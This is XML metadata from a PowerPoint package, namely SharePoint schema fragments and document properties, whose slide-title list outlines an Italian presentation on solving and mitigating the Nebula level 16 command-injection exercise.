    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithUsers" ma:index="8"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Condiviso con dettagli" ma:internalName="SharedWithDetails" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="SharingHintHash" ma:index="10" nillable="true" ma:displayName="Hash suggerimento condivisione"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1651439-6e46-4f78-9acb-4a905f92618b"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8518C8E-309D-434D-9B12-4FC3A81CC258}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7334DD00-2A3C-4043-B6D0-D05D2CE63075}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="25379ffa-1be3-456e-9b5c-56d073d73bb0"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="c1651439-6e46-4f78-9acb-4a905f92618b"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CECBDDE9-0669-406E-862E-76E881FD2275}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="25379ffa-1be3-456e-9b5c-56d073d73bb0"/>
    <ds:schemaRef ds:uri="c1651439-6e46-4f78-9acb-4a905f92618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5</TotalTime>
  <Words>3368</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentazione su schermo (16:9)</PresentationFormat>
  <Paragraphs>477</Paragraphs>
  <Slides>63</Slides>
  <Notes>63</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</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63</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="70" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Quicksand</vt:lpstr>
      <vt:lpstr>Livvic</vt:lpstr>
      <vt:lpstr>Bebas Neue</vt:lpstr>
      <vt:lpstr>Roboto Condensed Light</vt:lpstr>
      <vt:lpstr>International Programmers Day XL by Slidesgo</vt:lpstr>
      <vt:lpstr>NEBULA   LEVEL16</vt:lpstr>
      <vt:lpstr>TIMELINE</vt:lpstr>
      <vt:lpstr>DESCRIZIONE DEL PROBLEMA</vt:lpstr>
      <vt:lpstr>Level 16</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>ANALISI DIRECTORY ACCESSIBILI</vt:lpstr>
      <vt:lpstr>ANALISI DIRECTORY ACCESSIBILI</vt:lpstr>
      <vt:lpstr>Lo script Index.cgi</vt:lpstr>
      <vt:lpstr>Lo script Index.cgi</vt:lpstr>
      <vt:lpstr>Lo script Index.cgi</vt:lpstr>
      <vt:lpstr>Lo script Index.cgi</vt:lpstr>
      <vt:lpstr>SOLUZIONE</vt:lpstr>
      <vt:lpstr>02</vt:lpstr>
      <vt:lpstr>Esecuzione locale</vt:lpstr>
      <vt:lpstr>Un primo tentativo</vt:lpstr>
      <vt:lpstr>Un primo tentativo</vt:lpstr>
      <vt:lpstr>Presentazione standard di PowerPoint</vt:lpstr>
      <vt:lpstr>url encoding</vt:lpstr>
      <vt:lpstr>url encoding</vt:lpstr>
      <vt:lpstr>Cosa É andato storto?</vt:lpstr>
      <vt:lpstr>soluzione</vt:lpstr>
      <vt:lpstr>soluzione</vt:lpstr>
      <vt:lpstr>soluzione</vt:lpstr>
      <vt:lpstr>soluzione</vt:lpstr>
      <vt:lpstr>AGGIORNAMENTO ALBERO DI  ATTACCO</vt:lpstr>
      <vt:lpstr>SOLUZIONE</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>ANALISI DI THTTPD.CONF</vt:lpstr>
      <vt:lpstr>ANALISI DI THTTPD.CONF</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>AGGIORNAMENTO ALBERO DI  ATTACCO</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>INIEZIONE REMOTA</vt:lpstr>
      <vt:lpstr>CAPTURED THE FLAG</vt:lpstr>
      <vt:lpstr>DEBOLEZZE</vt:lpstr>
      <vt:lpstr>VULNERABILITà IN LEVEL16</vt:lpstr>
      <vt:lpstr>CWE-250 EsecUZIONE CON PRIVILEGI NON NECESSARI</vt:lpstr>
      <vt:lpstr>VULNERABILITà IN LEVEL16</vt:lpstr>
      <vt:lpstr>VULNERABILITà IN LEVEL16</vt:lpstr>
      <vt:lpstr>CWE-78 NEUTRALIZZAZIONE IMPROPRIA DI ELEMENTI…</vt:lpstr>
      <vt:lpstr>MITIGAZIONE</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #1</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #1</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #1</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #1</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #1</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #2</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #2</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #2</vt:lpstr>
      <vt:lpstr>MITIGAZIONE #2</vt:lpstr>
      <vt:lpstr>BONUS</vt:lpstr>
      <vt:lpstr>BONUS</vt:lpstr>
      <vt:lpstr>FILE SOLUZIONE AGGIORNATO</vt:lpstr>
      <vt:lpstr>BONUS</vt:lpstr>
      <vt:lpstr>BONUS</vt:lpstr>
      <vt:lpstr>GRAZIE PER L’ATTENZIONE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INTERNATIONAL PROGRAMMERS DAY</dc:title>
  <dc:creator>vincenzo marrazzo</dc:creator>
  <cp:lastModifiedBy>VINCENZO MARRAZZO</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-04T11:14:13Z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0x010100958A34E01316F8439D0AE3BCFE2030F9</vt:lpwstr>
  </property>
</Properties>
</file>